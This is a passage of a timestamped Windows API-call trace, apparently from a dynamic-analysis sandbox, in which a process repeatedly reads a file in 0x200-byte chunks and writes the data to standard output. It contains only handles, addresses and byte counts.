lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] GetFileType (hFile=0x50) returned 0x1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] GetFileType (hFile=0x50) returned 0x1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] GetFileType (hFile=0x50) returned 0x1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] GetFileType (hFile=0x50) returned 0x1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.600] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.600] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.600] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.600] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] GetFileType (hFile=0x50) returned 0x1 [0146.600] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.600] GetFileType (hFile=0x50) returned 0x1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] GetFileType (hFile=0x50) returned 0x1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] GetFileType (hFile=0x50) returned 0x1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] GetFileType (hFile=0x50) returned 0x1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] GetFileType (hFile=0x50) returned 0x1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] GetFileType (hFile=0x50) returned 0x1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.601] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.601] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.602] GetFileType (hFile=0x50) returned 0x1 [0146.602] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.602] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.602] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.602] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.602] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.602] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.602] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.602] GetFileType (hFile=0x50) returned 0x1 [0146.602] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.602] GetFileType (hFile=0x50) returned 0x1 [0146.602] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.602] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.602] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.602] GetFileType (hFile=0x50) returned 0x1 [0146.602] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.602] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] GetFileType (hFile=0x50) returned 0x1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] GetFileType (hFile=0x50) returned 0x1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] GetFileType (hFile=0x50) returned 0x1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] GetFileType (hFile=0x50) returned 0x1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] GetFileType (hFile=0x50) returned 0x1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.603] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.603] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.603] GetFileType (hFile=0x50) returned 0x1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] GetFileType (hFile=0x50) returned 0x1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] GetFileType (hFile=0x50) returned 0x1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] GetFileType (hFile=0x50) returned 0x1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] GetFileType (hFile=0x50) returned 0x1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] GetFileType (hFile=0x50) returned 0x1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] GetFileType (hFile=0x50) returned 0x1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.604] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.604] GetFileType (hFile=0x50) returned 0x1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.605] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.605] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.605] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.605] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] GetFileType (hFile=0x50) returned 0x1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] GetFileType (hFile=0x50) returned 0x1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] GetFileType (hFile=0x50) returned 0x1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] GetFileType (hFile=0x50) returned 0x1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] GetFileType (hFile=0x50) returned 0x1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.605] GetFileType (hFile=0x50) returned 0x1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] GetFileType (hFile=0x50) returned 0x1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] GetFileType (hFile=0x50) returned 0x1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.606] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.606] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.606] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.606] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] GetFileType (hFile=0x50) returned 0x1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] GetFileType (hFile=0x50) returned 0x1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] GetFileType (hFile=0x50) returned 0x1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.606] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.606] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] GetFileType (hFile=0x50) returned 0x1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] GetFileType (hFile=0x50) returned 0x1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] GetFileType (hFile=0x50) returned 0x1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] GetFileType (hFile=0x50) returned 0x1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] GetFileType (hFile=0x50) returned 0x1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.607] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.607] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.607] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.607] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.607] GetFileType (hFile=0x50) returned 0x1 [0146.607] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] GetFileType (hFile=0x50) returned 0x1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] GetFileType (hFile=0x50) returned 0x1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] GetFileType (hFile=0x50) returned 0x1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] GetFileType (hFile=0x50) returned 0x1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] GetFileType (hFile=0x50) returned 0x1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] GetFileType (hFile=0x50) returned 0x1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.608] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.608] GetFileType (hFile=0x50) returned 0x1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] WriteFile (in: hFile=0x50, lpBuffer=0x26ed64*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed64*, lpNumberOfBytesWritten=0x26dd68*=0x20, lpOverlapped=0x0) returned 1 [0146.609] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.609] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd54 | out: lpNewFilePointer=0x0) returned 1 [0146.609] _get_osfhandle (_FileHandle=4) returned 0x58 [0146.609] ReadFile (in: hFile=0x58, lpBuffer=0x26eb84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd74, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesRead=0x26dd74*=0x200, lpOverlapped=0x0) returned 1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] GetFileType (hFile=0x50) returned 0x1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] GetFileType (hFile=0x50) returned 0x1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] WriteFile (in: hFile=0x50, lpBuffer=0x26eb84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26eb84*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] GetFileType (hFile=0x50) returned 0x1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] WriteFile (in: hFile=0x50, lpBuffer=0x26ebd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ebd4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] GetFileType (hFile=0x50) returned 0x1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] WriteFile (in: hFile=0x50, lpBuffer=0x26ec24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec24*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] GetFileType (hFile=0x50) returned 0x1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.609] WriteFile (in: hFile=0x50, lpBuffer=0x26ec74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ec74*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] GetFileType (hFile=0x50) returned 0x1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] WriteFile (in: hFile=0x50, lpBuffer=0x26ecc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ecc4*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] GetFileType (hFile=0x50) returned 0x1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] WriteFile (in: hFile=0x50, lpBuffer=0x26ed14*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd68, lpOverlapped=0x0 | out: lpBuffer=0x26ed14*, lpNumberOfBytesWritten=0x26dd68*=0x50, lpOverlapped=0x0) returned 1 [0146.610] _get_osfhandle (_FileHandle=1) returned 0x50 [0146.610] GetFileType (hFile=0x50) returned 0x1 